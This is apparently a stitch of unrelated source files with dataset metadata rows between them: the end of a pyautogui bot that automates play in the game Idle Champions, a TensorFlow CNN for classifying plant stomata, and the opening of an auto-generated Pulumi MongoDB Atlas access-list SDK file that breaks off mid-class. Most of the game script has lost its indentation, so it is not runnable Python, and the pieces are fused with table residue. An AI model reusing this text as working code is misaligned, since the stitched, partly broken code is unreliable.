print("You have 5 seconds to hover ...")
time.sleep(5)
pos = pyautogui.position()
print("raw mouse: %s" % str(pos))
off_x, off_y = print_reverse_without_offset(int(pos.x), int(pos.y))
print("offset from top_x,top_y = %d, %d" % (off_x, off_y))
sys.exit(0)
if args.command == "zone":
print("Looking for the %s app" % APP_NAME)
time.sleep(1)
found_app = activate_app(APP_NAME, reset_top=True)
time.sleep(1)
finder = LevelFinder()
level, plus = finder.get_current_zone(True)
print("Zone found %d (at start zone: %s), (on_boss: %s)" % (level, not plus, on_boss()))
if level <= 0:
print("Could not find zone, zone image saved in my_screenshot*.png")
found, grey = check_for_menu()
print("Menu found=%s greyed out=%s" % (found, grey))
sys.exit(0)
no_modron_commands = ["run", "no-core", "no-modron", ]
if args.command in no_modron_commands:
if args.use_modron:
print("WARNING: Modron mode enabled but you are using the No Modron run command.")
print("Patron:%s / Familiars:%d / Minutes:%d / Team:%s (CTRL-C to stop)" % (
patron, args.familiars, args.loops, speed_team))
if args.command == "buy":
confirmation_msg = ""
if not args.confirm_buy:
confirmation_msg = "type Y to buy or N/"
msg = ("Buy %d gold chests for %d gems (%sCTRL-C to stop)" % (
args.loops, args.loops * 500, confirmation_msg))
if args.confirm_buy:
print(msg)
else:
agreed = query_yes_no(msg, default="no")
if not agreed:
sys.exit(1)
while args.command == "goto":
pyautogui.moveTo(1400, 50, duration=2.0)
pyautogui.click()
pyautogui.moveTo(924, 292, duration=2.0)
pyautogui.click()
time.sleep(5.0)
print("mouse: %s" % str(pyautogui.position()))
if args.command == "bs":
tiny = args.loops
small = args.extras[0]
medium = args.extras[1]
large = args.extras[2]
ilvls = tiny * 1 + small*2 + medium * 6 + large * 24
print("tiny=%d x 1 small=%d x 2 medium=%d x 6 large=%d x 24 = %d ilvls" % (
tiny,small,medium,large, ilvls,
))
sys.exit(1)
if args.command == "bc":
small = args.loops
medium = args.extras[0]
large = args.extras[1]
tokens = small*72 + medium * 576 + large * 1152
runs = tokens / 2500
print("small=%d x 72 medium=%d x 576 large=%d x 1152 = %d tokens (%d runs)" % (
small,medium,large, tokens, runs
))
sys.exit(1)
reduction = 0.032
if args.command == "briv4":
reduction = 0.04
args.command = "briv"
if args.command == "briv3":
args.command = "briv"
while args.command == "briv":
stacks = float(args.loops)
jumps = 0
print("stacks=%f jumps=%d odds=%f percent=%f" % (stacks, jumps, args.odds, reduction))
while stacks > 50.0:
stacks -= stacks * reduction
stacks = math.floor(stacks)
skipped = jumps * 3
levels = jumps * 3 + float(jumps) / args.odds * 100.0
print("stacks=%f jumps=%d skipped=%d levels=%d" % (
stacks, jumps, skipped, levels))
jumps += 1
sys.exit(1)
if args.command == "check":
print("Test Startup Complete")
check_for_menu()
sys.exit(0)
while args.command == "cmp":
im1 = Image.open("011.png").convert('RGB')
im2 = Image.open("levels/011.png").convert('RGB')
diff = ImageChops.difference(im1, im2)
result = ImageStat.Stat(diff)
print("mean=%s" % str(result.mean))
print("rms=%s" % str(result.rms))
diff.save('diff.png')
if diff.getbbox():
print("Not same, check diff.png, %s" % str(diff.getbbox()))
else:
print("Same")
sys.exit(1)
if args.command == "repair_shortcut":
result = repair_shortcut()
sys.exit(0 if result else 1)
# Commands above this line don't require Idle Champions to be running
# ########################################################################
# Start idle champions and foreground it
print("Starting/Foregrounding Idle Champions")
if args.countdown > 0:
print("Script will start in ...", end='', flush=True)
for s in range(args.countdown, 0, -1):
print(" %d ..." % s, end='', flush=True)
time.sleep(1.0)
print("now")
foreground_or_start(tries=5)
time.sleep(1.0)
# TODO: check that top_x and top_y have been set
verbose_print("Using top_x,top_y = %d,%d" % (top_x, top_y))
loops = 0
crashes = 0
# ########################################################################
# Commands below this line require Idle Champions to be running
while args.command == "complete":
loops += 1
complete = zone_complete(save_images=True, fast=True)
if complete:
print("zone complete")
else:
print("zone incomplete")
if loops > 10000:
sys.exit(0)
if args.command == "testfkey":
print("level_team_with_keys(args,[%s])" % speed_team)
level_team_with_keys(args,speed_team, between_champs=1.0)
sys.exit(0)
if args.command == "teststart":
print("Test Startup Complete")
sys.exit(0)
while args.command == "zap":
pyautogui.press("e")
time.sleep(5.0)
while args.command == "keep-alive":
time.sleep(args.loops)
print("Checking for game at %s" % datetime.datetime.now())
foreground_or_start()
continue
while args.command == "goto":
pyautogui.moveTo(2028, 20, duration=2.0)
print("mouse: %s" % str(pyautogui.position()))
break
if args.command == "bounty" or args.command == "small" or args.command == "medium":
start_image = "bountysmall.png"
bounty_size = "small"
if args.command == "medium" or args.size == "medium":
bounty_size = "medium"
start_image = "bountymedium.png"
print("Buying %s bounties of size %s" % (args.loops, bounty_size))
# Inventory Region
region = region_for_screenshot(350, 170, 565, 325)
try:
bounty_target = locate(start_image, search_region=region)
except Exception:
print("Error: could not find bounty image %s: is the inventory open?" % (start_image))
sys.exit(1)
if not bounty_target:
print("Error: could not find bounty image %s: is the inventory open?" % (start_image))
sys.exit(1)
# use offset instead of image find ...
bar_target = with_top_offset(742, 386, as_point=True)
go_target = with_top_offset(555, 432, as_point=True)
while True:
move_to_menu()
loops += 1
print("Buying bounty %d of %d" % (loops, args.loops))
bounty_target = click_with_position(start_image, bounty_target)
time.sleep(0.25)
bar_target = click_with_position("bountybar.png", bar_target)
time.sleep(0.25)
go_target = click_with_position("bountygo.png", go_target)
# drops can take a while to process, give it sec or two
if loops >= args.loops:
sys.exit(0)
time.sleep(1.5)
sys.exit(0)
if args.command == "silver" or args.command == "gold":
mouse_move_speed = 0.5
time.sleep(mouse_move_speed)
inventory_target = None
bar_target = None
go_target = None
flip_target = None
done_target = None
while True:
loops += 1
print("Opening 50 silver chests batch %d of %d" % (loops, args.loops))
# inventory_target = click_with_position("openinventory.png", inventory_target, 40, 100)
# move_to_menu()
# time.sleep(2)
click_offset(132, 126, duration=mouse_move_speed, delay=0.5)
# bar_target = click_with_position("bountybar.png", bar_target)
click_offset(744, 385, duration=mouse_move_speed, delay=0.5)
# go_target = click_with_position("openopen.png", go_target, click=False)
delay = 2.5
if args.command == "gold":
delay = 4.5
click_offset(551, 431, duration=mouse_move_speed, delay=delay)
# flip_target = click_with_position("openflip.png", flip_target)
click_offset(726, 359, duration=mouse_move_speed, delay=delay)
# click in same place for show all
# flip_target = click_with_position("openflip.png", flip_target)
click_offset(726, 359, duration=mouse_move_speed, delay=2.5)
# done_target = click_with_position("opendone.png", done_target)
pyautogui.press("esc")
# pyautogui.moveRel(300, 0, duration=0.0)
time.sleep(0.5)
if loops >= args.loops:
sys.exit(1)
while args.command == "testimages":
level, plus = get_current_zone(level_images, args.save_mismatch)
if level > 0:
print("zone found %d, %s, %s" % (level, plus, on_boss()))
else:
print("not found")
print("sleeping ... ")
time.sleep(3.0)
if args.command == "stack":
for s in range(args.loops, 0, -1):
print("===== Stacking: %d to go (charge_time=%d) =====" % (s, args.charge))
restart_stacking(args)
if s > 1:
time.sleep(15.0)
sys.exit(0)
if args.command == "testboss":
time.sleep(2.0)
is_on_boss = on_boss()
print("on boss = %s" % is_on_boss)
sys.exit(0)
if args.command == "testzone":
print("Testing zone detection")
found_app = activate_app(APP_NAME)
print("%s" % str(found_app))
print("%d,%d" % (found_app.left, found_app.top))
print("Configured top_x,top_y = %d,%d" % (top_x, top_y))
top_x, top_y = found_app.left+1, found_app.top+top_offset
print("new top_x,top_y = %d,%d" % (top_x, top_y))
level, plus = get_current_zone(level_images, True, tries=3)
if level <= 0:
sys.exit("Cound not find zone, saved in my_screenshot*.png")
print("Zone found %d (at start zone: %s), (on_boss: %s)" % (level, plus, on_boss()))
sys.exit(0)
if args.command == "legacyzone":
print("Legacy zone detection")
x, y = get_menu(tries=10)
region = get_level_region()
print("%d, %d vs %s" % (x, y, region))
level, plus = get_current_level(x, y, level_images, args.save_mismatch)
print("old %s, %s" % (level, plus))
sys.exit(0)
if args.command == "jimmy":
finder = LevelFinder()
for i in range(1,args.loops+1):
now = datetime.datetime.now()
print("Jimmy loops %d of %d (%s)" % (i, args.loops, str(now)))
pyautogui.press('g')
time.sleep(0.5)
pyautogui.press('w')
time.sleep(3.0)
pyautogui.press('e')
# level, plus = finder.get_current_zone()
# need images for the above
level = 1000
if level >= 1490:
print("Jimmy exiting at level %d" % (level))
pyautogui.press('left')
pyautogui.press('left')
pyautogui.press('left')
pyautogui.press('left')
pyautogui.press('left')
pyautogui.press('left')
pyautogui.press('left')
sys.exit(0)
time.sleep(args.charge)
# click back to 1
for j in range(0,4):
pyautogui.keyDown('shift')
time.sleep(0.1)
click_offset(924, 105)
pyautogui.keyUp('shift')
time.sleep(1.0)
click_offset(971, 106)
time.sleep(3.0)
pyautogui.keyDown('shift')
time.sleep(0.1)
click_offset(924, 105)
pyautogui.keyUp('shift')
time.sleep(1.0)
click_offset(971, 106)
pyautogui.keyUp('shift')
time.sleep(args.charge)
sys.exit(0)
if args.command == "modron":
infinite_loop = True
# try:
# verified = verify_menu(update=False)
# except Exception:
# print("ERROR: Can't verify menu location. Exiting.")
print("Modron Gem Farming: Briv recharge=%d; modron goal=%d; charge=%f seconds; havi ult=%s; hew ult=%s shandie=%ds" % (
args.target-args.briv_recharge_areas,
args.target,
args.charge, args.havi_ult, args.hew_ult,
args.charge_shandie
))
finder = LevelFinder()
print("(Hit CTRL-C to stop or move mouse to the corner of the screen)")
need_havi_ult = True
need_recharge = True
log_restarted = False
need_leveling = not config.getboolean("idler", "familiar_leveling")
log_initial = True
last_level = -1
now = datetime.datetime.now()
tracker = Tracker(now=now,
zones=args.target,
verbose=verbose,)
last_level_time = now
while True:
now = datetime.datetime.now()
try:
level, plus = finder.get_current_zone(save=args.save_mismatch)
if verbose and not debugging:
print("Zone found %d (at start zone: %s)" % (level, plus))
if debugging:
print("Zone found %d (at start zone: %s), (on_boss: %s)" % (level, plus, on_boss()))
except Exception as e:
print("Error getting current level: %s" % str(e))
level = -2
plus = False
verbose_print("Level %d" % level)
if log_initial:
tracker.start_tracking(now, level, plus)
log_initial = False
# check for stalled or hung game
if last_level == level and level > 0:
# check delta
delta = (now - last_level_time).total_seconds()
if delta > 45:
# try 'q' 'g' to see if it unsticks
pyautogui.press('q')
pyautogui.press('g')
pyautogui.press('q')
if delta > 90:
print("Error stuck at zone %s at %s for %d seconds ..." % (level, datetime.datetime.now(), delta))
# kill the app and restart
shutdown_app(args.keyboard_shutdown)
# attempt restart below
level = -1
else:
last_level = level
last_level_time = now
if level <= 0:
try:
verbose_print("Error: is restart needed?")
accept_screen_share(args.screenshare)
foreground_or_start()
# TODO: Need to be able to see if in auto or ran by end zone or ... or maybe if stuck triggered?
# time.sleep(1.0)
# pyautogui.press("g")
except Exception as e:
print("Error restarting... wait and try again %s" % str(e))
time.sleep(10.0)
elif level == 1 and not plus and log_restarted and args.charge_shandie > 0:
need_recharge = True
log_restarted = False
time.sleep(0.2)
pyautogui.press("g")
tracker.start_loop(now, level, plus)
print("Loop started %s: %d (charging shandie for %d seconds)" % (
datetime.datetime.now(), level, args.charge_shandie))
for i in range(0, 20):
pyautogui.press("f5")
for i in range(0, 20):
pyautogui.press("f6")
time.sleep(args.charge_shandie)
foreground_or_start()
if need_havi_ult:
need_havi_ult = False
print("Havi Ult")
pyautogui.press(args.havi_ult)
time.sleep(0.5)
pyautogui.press("g")
time.sleep(5.0)
elif level == 1 and need_leveling:
if log_restarted:
log_restarted = False
tracker.start_loop(now, level, plus)
print("Loop started %s: %d" % (datetime.datetime.now(), level))
# Manual leveling
level_team_with_keys(args, speed_team, between_champs=DEFAULT_DELAY)
need_leveling = False
need_recharge = True
elif level < 40 and need_havi_ult:
need_recharge = True
if log_restarted:
tracker.start_loop(now, level, plus)
log_restarted = False
if level >= 11:
need_havi_ult = False
print("Havi Ult")
for i in range(0,40):
pyautogui.press(args.havi_ult)
time.sleep(0.1)
time.sleep(1.0)
elif level < args.target - 50:
diff = args.target - level
if args.briv_boss:
# foreground_or_start()
debug_print("checking for team on_boss")
if plus and on_boss(fast=True):
verbose_print("team is on_boss")
pyautogui.press('e')
pyautogui.press('g')
while not zone_complete():
# print("zone uncomplete")
pass
pyautogui.press('q')
time.sleep(0.5)
pyautogui.press('g')
time.sleep(0.5)
pyautogui.press('q')
time.sleep(1.0)
if args.screenshare:
accept_screen_share(args.screenshare)
else:
time.sleep(diff*0.25)
foreground_or_start()
elif level < args.target - args.briv_recharge_areas:
verbose_print("continue at %d" % level)
continue
else:
verbose_print("check for recharge at %d" % level)
log_restarted = True
if need_recharge:
charge_briv(level, plus, level_images, args)
last_level = -1
last_level_time = datetime.datetime.now()
verbose_print("Recharge finished: %s" % last_level_time)
need_recharge = False
need_havi_ult = True
OFFSET_xx2 = 1925 - OFFSET_xx1
OFFSET_xx3 = 2025 - OFFSET_xx1
OFFSET_xx4 = 2122 - OFFSET_xx1
if args.command == "grab":
region = get_level_region()
raw_im = pyautogui.screenshot(region=region)
im = raw_im.convert('RGB')
im.save("1xx.png")
sys.exit(0)
x, y = menu_location()
pyautogui.moveTo(x, y)
x, y = location_for_screenshot(440, 240)
region = region_for_screenshot(350, 170, 565, 325)
im = pyautogui.screenshot(region=region)
im.save("inventory.png")
sys.exit(0)
level, plus = get_current_zone(level_images, args.save_mismatch)
# x, y = get_menu()
print("x = %f y = %f" % (x, y))
# x01
# x = menu_home.x * 2 + 1830
# y = menu_home.y * 2 + 10
im = pyautogui.screenshot(region=(x, y, IMAGE_WIDTH, IMAGE_HEIGHT))
im.save("1xx.png")
# x02
# x = menu_home.x * 2 + 1927
im = pyautogui.screenshot(region=(x+OFFSET_xx2, y, IMAGE_WIDTH, IMAGE_HEIGHT))
im.save("2xx.png")
# x03
# x = menu_home.x * 2 + 2025
im = pyautogui.screenshot(region=(x+OFFSET_xx3, y, IMAGE_WIDTH, IMAGE_HEIGHT))
im.save("3xx.png")
# x04
# x = menu_home.x * 2 + 2122
im = pyautogui.screenshot(region=(x+OFFSET_xx4, y, IMAGE_WIDTH, IMAGE_HEIGHT))
im.save("4xx.png")
# boss
# x = menu_home.x * 2 + 2219
# im = pyautogui.screenshot(region=(x, y, 56, 56))
# im.save("boss.png")
sys.exit(1)
while args.command == "monitor":
time.sleep(1.0)
menu_home = locate('menu.png')
print("menu_home.x = %f menu_home.y = %f" % (menu_home.x, menu_home.y))
x = menu_home.x * 2 + 1830
y = menu_home.y * 2 + 10
# Try grabbing a small section of screen
for i in range(0,300):
time.sleep(5)
im = pyautogui.screenshot(region=(x, y, IMAGE_WIDTH, IMAGE_HEIGHT))
# in list?
found = False
for name, img in level_images.items():
diff = ImageChops.difference(im.convert('RGB'), img).getbbox()
if not diff:
try:
level = int(name[7:10])
except Exception:
level = 0
print("Found %s again %s" % (name, level))
found = True
break
if found:
continue
print("Saving %i" % i)
im.save('my_screenshot%d.png' % i)
break
if args.command == "move":
x = args.loops
y = args.extras[0]
found_app = activate_app(APP_NAME)
rect = found_app._rect
print("app=%s" % str(found_app))
sys.exit(0)
# click_second_spec(delay=1.0)
while args.command == "press":
keys = ["q", "w", "e"]
print("Pressing %s" % keys[args.loops-1])
pyautogui.press(keys[args.loops-1])
time.sleep(10)
# click_second_spec(delay=1.0)
while args.command == "buy":
found = click_image("1chest.png", "1chestH.png", delay=0.5)
time.sleep(0.25)
while found:
pyautogui.moveRel(900, 0, duration=0.0)
time.sleep(0.25)
pyautogui.click()
loops += 1
if loops >= args.loops:
break
time.sleep(2.5)
pyautogui.moveRel(-900, 0, duration=0.0)
time.sleep(0.25)
pyautogui.click()
time.sleep(0.25)
if loops >= args.loops:
break
start_time = datetime.datetime.now()
do_startup = True
if args.in_progress:
do_startup = False
wait_minutes = 10 if args.loops == 0 else args.loops
while args.command in no_modron_commands:
infinite_loop = True
loop_time = datetime.datetime.now()
menu_home = None
ult = 0
loops += 1
if loops > args.runloops:
break
print("Starting loop %d at %s" % (loops, datetime.datetime.now()))
if do_startup:
# Startup by clicking on the Mad Wizard City
start_it_up(args.adventure)
for i in range(0, 20):
time.sleep(1.0)
blue, grey = check_for_menu()
if blue or grey:
break
# We are now on Level 1: Time to GO
# Drop Fams First
print("Dropping up to %d Familiars" % (args.familiars,))
time.sleep(DEFAULT_DELAY)
pyautogui.press('g')
time.sleep(DEFAULT_DELAY)
# Now we have formations!
# place_click_familiars(args.familiars)
pyautogui.press('q')
time.sleep(DEFAULT_DELAY)
# Level Champs
print("Leveling up Champs")
level_team_with_keys(args, speed_team, between_champs=DEFAULT_DELAY)
print("Running for %d minutes before checking for Briv Charging %s" % (args.loops, datetime.datetime.now()))
for m in range(wait_minutes, 0, -1):
print(" %d minutes" % m)
time.sleep(60.0)
do_startup = True
# check the level and charge Briv
# recharge Briv
if have_briv:
while True:
try:
time.sleep(10)
level, plus = get_current_zone(level_images, args.save_mismatch)
if level >= args.target:
charge_briv(level, plus, level_images, args)
break
except Exception as a:
print("Briv Charge Error: %s" % str(a))
pass
# shutdown the loop
print("Wrapping up starting at %s" % (datetime.datetime.now()))
try:
wrap_it_up()
except Exception as a:
print("Wrap Up Error: %s" % str(a))
pass
# dump some stats
run_time = datetime.datetime.now() - start_time
loop_time = datetime.datetime.now() - loop_time
print("Loops: %d Runtime: %s This Loop: %s Average Loop: %s Crashes: %d" % (
loops,
run_time,
loop_time,
run_time / float(loops),
crashes)
)
# print("%s" % list(pyautogui.locateAllOnScreen('./burger2.png')))
if __name__ == "__main__":
    # Entry point: run main_method() once, and keep re-running it only while a
    # command handler has flagged `infinite_loop` (set inside main_method for
    # long-running commands such as "modron").  Ordinary exceptions are logged
    # and retried after a short pause; SystemExit (raised by the sys.exit(0)
    # calls in the command handlers) and KeyboardInterrupt are deliberately
    # not caught, so they still terminate the script.
    first_loop = True
    while first_loop or infinite_loop:
        try:
            main_method()
        except Exception as e:
            print("WARNING: exception caught: %s" % e)
            time.sleep(5.0)
        # BUG FIX: `first_loop` was never cleared, so the loop condition was
        # permanently true and main_method() restarted forever even when
        # `infinite_loop` was False.  Clear it after the first pass so only
        # infinite-loop commands keep running.
        first_loop = False
| 36.048294 | 228 | 0.561127 |
0360303a8119a78eb7122982d841db4e8be17832 | 4,023 | py | Python | deepstomata/stomata_model.py | totti0223/deepstomata | e4f5dd5d1a65232ed13f6bea6f4d1f02d1494558 | [
"MIT"
] | 5 | 2018-07-10T00:59:59.000Z | 2021-07-02T02:39:33.000Z | deepstomata/stomata_model.py | totti0223/deepstomata | e4f5dd5d1a65232ed13f6bea6f4d1f02d1494558 | [
"MIT"
] | null | null | null | deepstomata/stomata_model.py | totti0223/deepstomata | e4f5dd5d1a65232ed13f6bea6f4d1f02d1494558 | [
"MIT"
] | 3 | 2018-12-21T20:42:02.000Z | 2019-11-02T10:26:37.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import tensorflow as tf
from math import sqrt
MOVING_AVERAGE_DECAY = 0.9999
def tf_inference(images, BATCH_SIZE, image_size, NUM_CLASSES):
    """Build the stomata-classification CNN graph and return its logits.

    Architecture: four conv(3x3) + ReLU + max-pool(3x3, stride 2) stages with
    32/64/128/256 filters, followed by two fully connected ReLU layers (1024
    and 256 units) and a final linear layer producing one logit per class.
    Written against the pre-1.0 TensorFlow API used throughout this file
    (tf.mul, tf.scalar_summary, tf.get_variable under tf.variable_scope).

    Args:
        images: input image batch; NHWC layout with 3 channels (conv1's
            kernel is [3, 3, 3, 32]).
        BATCH_SIZE: number of images per batch; used to flatten pool4 before
            the fully connected layers.
        image_size: unused here; kept so existing callers' signatures work.
        NUM_CLASSES: number of output classes (width of the final layer).

    Returns:
        fc7: the [BATCH_SIZE, NUM_CLASSES] logits tensor (softmax is NOT
        applied; apply it or a softmax cross-entropy loss downstream).
    """
    def _variable_with_weight_decay(name, shape, stddev, wd):
        # Create a variable; when `wd` is truthy, also register an L2
        # weight-decay term for it in the 'losses' graph collection.
        var = tf.get_variable(name, shape=shape, initializer=tf.truncated_normal_initializer(stddev=stddev))
        if wd:
            weight_decay = tf.mul(tf.nn.l2_loss(var), wd, name='weight_loss')
            tf.add_to_collection('losses', weight_decay)
        return var

    def _activation_summary(x):
        # Record activation sparsity for TensorBoard.
        # NOTE(review): never called within this function; kept for parity
        # with the original code — confirm before deleting.
        tensor_name = x.op.name
        tf.scalar_summary(tensor_name + '/sparsity', tf.nn.zero_fraction(x))

    with tf.variable_scope('conv1') as scope:
        # Stage 1: 3x3 conv, 3 -> 32 channels, then overlapping 3x3/stride-2
        # max-pool that halves the spatial resolution.
        kernel = tf.get_variable('weights', shape=[3, 3, 3, 32], initializer=tf.truncated_normal_initializer(stddev=0.1))
        conv = tf.nn.conv2d(images, kernel, [1, 1, 1, 1], padding='SAME')
        biases = tf.get_variable('biases', shape=[32], initializer=tf.constant_initializer(0.0))
        bias = tf.nn.bias_add(conv, biases)
        conv1 = tf.nn.relu(bias, name=scope.name)
        pool1 = tf.nn.max_pool(conv1, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME', name='pool1')
    with tf.variable_scope('conv2') as scope:
        # Stage 2: 32 -> 64 channels.
        kernel = tf.get_variable('weights', shape=[3, 3, 32, 64], initializer=tf.truncated_normal_initializer(stddev=0.1))
        conv = tf.nn.conv2d(pool1, kernel, [1, 1, 1, 1], padding='SAME')
        biases = tf.get_variable('biases', shape=[64], initializer=tf.constant_initializer(0.0))
        bias = tf.nn.bias_add(conv, biases)
        conv2 = tf.nn.relu(bias, name=scope.name)
        pool2 = tf.nn.max_pool(conv2, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME', name='pool2')
    with tf.variable_scope('conv3') as scope:
        # Stage 3: 64 -> 128 channels.
        kernel = tf.get_variable('weights', shape=[3, 3, 64, 128], initializer=tf.truncated_normal_initializer(stddev=0.1))
        conv = tf.nn.conv2d(pool2, kernel, [1, 1, 1, 1], padding='SAME')
        biases = tf.get_variable('biases', shape=[128], initializer=tf.constant_initializer(0.0))
        bias = tf.nn.bias_add(conv, biases)
        conv3 = tf.nn.relu(bias, name=scope.name)
        pool3 = tf.nn.max_pool(conv3, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME', name='pool3')
    with tf.variable_scope('conv4') as scope:
        # Stage 4: 128 -> 256 channels.
        kernel = tf.get_variable('weights', shape=[3, 3, 128, 256], initializer=tf.truncated_normal_initializer(stddev=0.1))
        conv = tf.nn.conv2d(pool3, kernel, [1, 1, 1, 1], padding='SAME')
        biases = tf.get_variable('biases', shape=[256], initializer=tf.constant_initializer(0.0))
        bias = tf.nn.bias_add(conv, biases)
        conv4 = tf.nn.relu(bias, name=scope.name)
        pool4 = tf.nn.max_pool(conv4, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME', name='pool4')
    with tf.variable_scope('fc5') as scope:
        # Flatten pool4 ([BATCH_SIZE, h, w, 256] -> [BATCH_SIZE, h*w*256])
        # and apply the first fully connected layer; only the FC weights
        # carry weight decay (wd=0.005).
        dim = 1
        for d in pool4.get_shape()[1:].as_list():
            dim *= d
        reshape = tf.reshape(pool4, [BATCH_SIZE, dim])
        weights = _variable_with_weight_decay('weights', shape=[dim, 1024], stddev=0.02, wd=0.005)
        biases = tf.get_variable('biases', shape=[1024], initializer=tf.constant_initializer(0.0))
        fc5 = tf.nn.relu(tf.nn.bias_add(tf.matmul(reshape, weights), biases), name=scope.name)
    with tf.variable_scope('fc6') as scope:
        weights = _variable_with_weight_decay('weights', shape=[1024, 256], stddev=0.02, wd=0.005)
        biases = tf.get_variable('biases', shape=[256], initializer=tf.constant_initializer(0.0))
        fc6 = tf.nn.relu(tf.nn.bias_add(tf.matmul(fc5, weights), biases), name=scope.name)
    with tf.variable_scope('fc7') as scope:
        # Final linear projection to class logits (no activation, no decay).
        weights = tf.get_variable('weights', shape=[256, NUM_CLASSES], initializer=tf.truncated_normal_initializer(stddev=0.02))
        biases = tf.get_variable('biases', shape=[NUM_CLASSES], initializer=tf.constant_initializer(0.0))
        fc7 = tf.nn.bias_add(tf.matmul(fc6, weights), biases, name=scope.name)
    # FIX: the original final line was fused with dataset-extraction residue
    # ("return fc7 | 55.109589 | 128 | 0.656724 |"), a syntax error in-file.
    return fc7
82186ff702d7becb45fe10117bb47a0cfd5ddb64 | 22,737 | py | Python | sdk/python/pulumi_mongodbatlas/project_ip_access_list.py | pulumi/pulumi-mongodbatlas | 0d5c085dcfd871b56fb4cf582620260b70caa07a | [
"ECL-2.0",
"Apache-2.0"
] | 9 | 2020-04-28T19:12:30.000Z | 2022-03-22T23:04:46.000Z | sdk/python/pulumi_mongodbatlas/project_ip_access_list.py | pulumi/pulumi-mongodbatlas | 0d5c085dcfd871b56fb4cf582620260b70caa07a | [
"ECL-2.0",
"Apache-2.0"
] | 59 | 2020-06-12T12:12:52.000Z | 2022-03-28T18:14:50.000Z | sdk/python/pulumi_mongodbatlas/project_ip_access_list.py | pulumi/pulumi-mongodbatlas | 0d5c085dcfd871b56fb4cf582620260b70caa07a | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2020-09-25T21:22:08.000Z | 2021-08-30T20:06:18.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['ProjectIpAccessListArgs', 'ProjectIpAccessList']
@pulumi.input_type
class ProjectIpAccessListArgs:
    # NOTE: machine-generated by the Pulumi Terraform Bridge (tfgen); hand
    # edits are normally overwritten when the SDK is regenerated.
    def __init__(__self__, *,
                 project_id: pulumi.Input[str],
                 aws_security_group: Optional[pulumi.Input[str]] = None,
                 cidr_block: Optional[pulumi.Input[str]] = None,
                 comment: Optional[pulumi.Input[str]] = None,
                 ip_address: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a ProjectIpAccessList resource.
        :param pulumi.Input[str] project_id: Unique identifier for the project to which you want to add one or more access list entries.
        :param pulumi.Input[str] aws_security_group: Unique identifier of the AWS security group to add to the access list. Your access list entry can include only one `awsSecurityGroup`, one `cidrBlock`, or one `ipAddress`.
        :param pulumi.Input[str] cidr_block: Range of IP addresses in CIDR notation to be added to the access list. Your access list entry can include only one `awsSecurityGroup`, one `cidrBlock`, or one `ipAddress`.
        :param pulumi.Input[str] comment: Comment to add to the access list entry.
        :param pulumi.Input[str] ip_address: Single IP address to be added to the access list. Mutually exclusive with `awsSecurityGroup` and `cidrBlock`.
        """
        pulumi.set(__self__, "project_id", project_id)
        # Only keys the caller actually supplied are stored; the Atlas API
        # expects exactly one of aws_security_group / cidr_block / ip_address.
        if aws_security_group is not None:
            pulumi.set(__self__, "aws_security_group", aws_security_group)
        if cidr_block is not None:
            pulumi.set(__self__, "cidr_block", cidr_block)
        if comment is not None:
            pulumi.set(__self__, "comment", comment)
        if ip_address is not None:
            pulumi.set(__self__, "ip_address", ip_address)
    @property
    @pulumi.getter(name="projectId")
    def project_id(self) -> pulumi.Input[str]:
        """
        Unique identifier for the project to which you want to add one or more access list entries.
        """
        return pulumi.get(self, "project_id")
    @project_id.setter
    def project_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "project_id", value)
    @property
    @pulumi.getter(name="awsSecurityGroup")
    def aws_security_group(self) -> Optional[pulumi.Input[str]]:
        """
        Unique identifier of the AWS security group to add to the access list. Your access list entry can include only one `awsSecurityGroup`, one `cidrBlock`, or one `ipAddress`.
        """
        return pulumi.get(self, "aws_security_group")
    @aws_security_group.setter
    def aws_security_group(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "aws_security_group", value)
    @property
    @pulumi.getter(name="cidrBlock")
    def cidr_block(self) -> Optional[pulumi.Input[str]]:
        """
        Range of IP addresses in CIDR notation to be added to the access list. Your access list entry can include only one `awsSecurityGroup`, one `cidrBlock`, or one `ipAddress`.
        """
        return pulumi.get(self, "cidr_block")
    @cidr_block.setter
    def cidr_block(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "cidr_block", value)
    @property
    @pulumi.getter
    def comment(self) -> Optional[pulumi.Input[str]]:
        """
        Comment to add to the access list entry.
        """
        return pulumi.get(self, "comment")
    @comment.setter
    def comment(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "comment", value)
    @property
    @pulumi.getter(name="ipAddress")
    def ip_address(self) -> Optional[pulumi.Input[str]]:
        """
        Single IP address to be added to the access list. Mutually exclusive with `awsSecurityGroup` and `cidrBlock`.
        """
        return pulumi.get(self, "ip_address")
    @ip_address.setter
    def ip_address(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "ip_address", value)
@pulumi.input_type
class _ProjectIpAccessListState:
    # NOTE: machine-generated by the Pulumi Terraform Bridge (tfgen).
    # Unlike ProjectIpAccessListArgs, every field here (including project_id)
    # is optional because this type is used to look up / filter existing
    # resources rather than to create them.
    def __init__(__self__, *,
                 aws_security_group: Optional[pulumi.Input[str]] = None,
                 cidr_block: Optional[pulumi.Input[str]] = None,
                 comment: Optional[pulumi.Input[str]] = None,
                 ip_address: Optional[pulumi.Input[str]] = None,
                 project_id: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering ProjectIpAccessList resources.
        :param pulumi.Input[str] aws_security_group: Unique identifier of the AWS security group to add to the access list. Your access list entry can include only one `awsSecurityGroup`, one `cidrBlock`, or one `ipAddress`.
        :param pulumi.Input[str] cidr_block: Range of IP addresses in CIDR notation to be added to the access list. Your access list entry can include only one `awsSecurityGroup`, one `cidrBlock`, or one `ipAddress`.
        :param pulumi.Input[str] comment: Comment to add to the access list entry.
        :param pulumi.Input[str] ip_address: Single IP address to be added to the access list. Mutually exclusive with `awsSecurityGroup` and `cidrBlock`.
        :param pulumi.Input[str] project_id: Unique identifier for the project to which you want to add one or more access list entries.
        """
